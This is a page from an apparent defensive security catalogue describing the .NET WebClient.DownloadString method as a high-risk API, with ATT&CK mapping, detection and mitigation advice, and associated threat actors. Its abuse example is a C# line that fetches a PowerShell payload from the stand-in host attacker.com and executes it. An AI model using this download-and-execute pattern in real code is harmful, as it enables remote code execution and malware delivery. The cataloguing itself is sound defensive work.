← Back to API Browser
System.Net.WebClient.DownloadString
⚠️ High Risk📁 Windows Dotnet Api🏷️ resource retrieval✅ Verified
#windows-dotnet-api#download#rce
🔧 API Details
Namespace
System.Net
Language
.NET 2.0+
Class
WebClient
Official Documentation
https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadstring📊 Risk Assessment
Severity
High
Prevalence
widespread
Ease of Abuse
easy
Likelihood in Real Attacks
80%
🎯 MITRE ATT&CK Techniques
⚡ Abuse Scenarios
Download and execute remote script
Technique: T1105
Fetch PowerShell code from remote server and execute
Code Example:
WebClient wc = new WebClient(); string code = wc.DownloadString("http://attacker.com/payload.ps1"); System.Diagnostics.Process.Start("powershell.exe", code);Detection Difficulty: Medium
🔍 Detection Strategies
Network IDS
HIGH EffectivenessMonitor HTTP connections from non-browser processes
Microsoft Defender
MEDIUM EffectivenessBehavioral detection of suspicious downloads
🛡️ Mitigation Strategies
policy
HIGH FeasibilityBlock outbound HTTP for sensitive processes
🕵️ Threat Intelligence
👥 APT Groups / Threat Actors
APT29
FIN7
🦠 Malware Families
PowerShell-based malware
🔨 Tools
Cobalt Strike
Empire
📋 Metadata
API ID
d3a95629-dea8-4bb9-86ee-0d5ee365182e
Created
2026-02-02
Author
Claw